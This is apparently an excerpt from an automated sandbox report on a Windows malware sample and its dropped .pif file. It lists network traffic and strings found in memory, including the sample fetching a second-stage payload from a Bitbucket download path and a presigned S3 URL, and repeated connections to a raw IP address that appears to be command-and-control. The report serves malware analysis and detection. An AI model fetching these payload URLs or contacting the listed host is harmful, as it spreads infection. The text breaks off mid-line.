Source: global traffic HTTP traffic detected: GET /03fa479d-619a-4b32-874d-a4ddf918e902/downloads/d7dc9789-914b-4b62-89ef-579d6fe0ba3c/145_Lrtuqtwkqjp?response-content-disposition=attachment%3B%20filename%3D%22145_Lrtuqtwkqjp%22&AWSAccessKeyId=ASIA6KOSE3BNOQT3MNUT&Signature=HpvdHxflptQ6Mxxy6w7Xktk9dgk%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEID%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDgwMDUl6D2KTxC7iL2QVaBadKAUxTjJz1KMzXvLf5%2BpgIgTRO4SABVxmCQoWazUSEPaSpy5v1lGHSxQmTiyJUgKPAqpwIIKBAAGgw5ODQ1MjUxMDExNDYiDPuetcPLSjcAvKz5TSqEAhr%2BorbpyRYdPN0yhpd9ACGtc9C7vjVYjaRQhp79Knmxmi%2BhtzJ2ZFGyF3K4UcZQINBPt%2FA0poELzy%2BACEfluTvpR0wGqNSC9LHZtwFsfFzNxVc5E1PQ1FtRFc9J1zRO5taQtCJd5YjPOVx%2FXqFr902zrLJhf4bs5LgTexf51DG4qZrrcVCF9FGXD9L%2FD65%2Fwv7UMNBHqYc1td0c0Mbe%2B3A9Pm%2FRruO9gheLDMJpPLIW0JI%2BTWVMZTpsAxQPmVS2jj0f7Lf9k09q4KD9zuGHYNqr%2BHV8fiqSP21bzUxtw%2FM402ALL%2B6OFS1IGmm9fvY2L5chKL7ya2cidXyC7%2BmL5NycfO55MJTqlboGOp0B4iZCnHI5ZuwBV7YQG2KDg68HqS3lOe1paqH0zfCD7yKZE1xkpd2LBPjyshtyjnxZZbGjSm%2F5AOIWBgxGheX0xf%2F0Hm94DZT2DTuhnaflP5bzRkxS427bAiZgQ%2B0u9qSwK%2BScIUqfDCHoerccQ1fhaKjAJ8Hxl%2BzRM0NE6QkL6NYzK9BjkyBGrGZ0JfiEO1UEn7gn2EAuHjTbyxJR5Q%3D%3D&Expires=1732607004 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.125.217
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_004066A8 setsockopt,recv,recv, 10_2_004066A8
Source: global traffic HTTP traffic detected: GET /masterservicwes/mastermanservices/downloads/145_Lrtuqtwkqjp HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /03fa479d-619a-4b32-874d-a4ddf918e902/downloads/d7dc9789-914b-4b62-89ef-579d6fe0ba3c/145_Lrtuqtwkqjp?response-content-disposition=attachment%3B%20filename%3D%22145_Lrtuqtwkqjp%22&AWSAccessKeyId=ASIA6KOSE3BNOQT3MNUT&Signature=HpvdHxflptQ6Mxxy6w7Xktk9dgk%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEID%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDgwMDUl6D2KTxC7iL2QVaBadKAUxTjJz1KMzXvLf5%2BpgIgTRO4SABVxmCQoWazUSEPaSpy5v1lGHSxQmTiyJUgKPAqpwIIKBAAGgw5ODQ1MjUxMDExNDYiDPuetcPLSjcAvKz5TSqEAhr%2BorbpyRYdPN0yhpd9ACGtc9C7vjVYjaRQhp79Knmxmi%2BhtzJ2ZFGyF3K4UcZQINBPt%2FA0poELzy%2BACEfluTvpR0wGqNSC9LHZtwFsfFzNxVc5E1PQ1FtRFc9J1zRO5taQtCJd5YjPOVx%2FXqFr902zrLJhf4bs5LgTexf51DG4qZrrcVCF9FGXD9L%2FD65%2Fwv7UMNBHqYc1td0c0Mbe%2B3A9Pm%2FRruO9gheLDMJpPLIW0JI%2BTWVMZTpsAxQPmVS2jj0f7Lf9k09q4KD9zuGHYNqr%2BHV8fiqSP21bzUxtw%2FM402ALL%2B6OFS1IGmm9fvY2L5chKL7ya2cidXyC7%2BmL5NycfO55MJTqlboGOp0B4iZCnHI5ZuwBV7YQG2KDg68HqS3lOe1paqH0zfCD7yKZE1xkpd2LBPjyshtyjnxZZbGjSm%2F5AOIWBgxGheX0xf%2F0Hm94DZT2DTuhnaflP5bzRkxS427bAiZgQ%2B0u9qSwK%2BScIUqfDCHoerccQ1fhaKjAJ8Hxl%2BzRM0NE6QkL6NYzK9BjkyBGrGZ0JfiEO1UEn7gn2EAuHjTbyxJR5Q%3D%3D&Expires=1732607004 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
Source: global traffic DNS traffic detected: DNS query: bitbucket.org
Source: global traffic DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: qqig1mHX8U.exe, qqig1mHX8U.exe, 00000000.00000002.2441581581.0000000021EDF000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2398965096.0000000021C5B000.00000004.00000020.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2415926480.0000000002D82000.00000004.00000020.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2302443683.0000000002D84000.00000004.00000020.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2444847577.000000007FA2F000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2303201589.000000007FB9F000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020DC7000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2441581581.0000000021F6A000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2398965096.0000000021BFD000.00000004.00000020.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2418192192.0000000002F3E000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3562010579.00000000232A0000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000000.2399543072.0000000000416000.00000002.00000001.01000000.00000007.sdmp, kwtqutrL.pif, 00000015.00000000.2535790950.0000000000416000.00000002.00000001.01000000.00000007.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.0000000000E4F000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000EDF000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2601722800.000000002FB59000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000EDF000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000000.2613123189.0000000000416000.00000002.00000001.01000000.00000007.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000E4F000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif.0.dr String found in binary or memory: http://www.pmail.com
Source: qqig1mHX8U.exe, 00000000.00000003.2375336653.0000000000601000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: qqig1mHX8U.exe, 00000000.00000003.2375336653.0000000000601000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: qqig1mHX8U.exe, 00000000.00000002.2401737655.00000000005C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: qqig1mHX8U.exe, 00000000.00000003.2375336653.0000000000601000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/d7dc9789-914b-
Source: qqig1mHX8U.exe, 00000000.00000002.2401737655.00000000005C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/03fa479d-619a-4b32-874d-a4ddf918e902/downloads/d7dc9789-9
Source: qqig1mHX8U.exe, 00000000.00000002.2401737655.0000000000585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/
Source: qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020E7D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/masterservicwes/ma
Source: qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020DC7000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/masterservicwes/mastermanservices/downloads/145_Lrtuqtwkqjp
Source: qqig1mHX8U.exe, 00000000.00000003.2375336653.0000000000601000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: kwtqutrL.pif String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
Source: qqig1mHX8U.exe, 00000000.00000003.2400002737.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2441581581.0000000021EDF000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2441581581.0000000021F6A000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000003.2424443585.0000000021165000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000003.2424018007.0000000021165000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000003.2423107004.0000000021155000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000003.2424419773.0000000021151000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000003.2424461904.0000000021167000.00000004.00000020.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.000000000041A000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Lrtuqtwk.PIF, 00000013.00000002.2572232052.0000000020C20000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.000000000041A000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 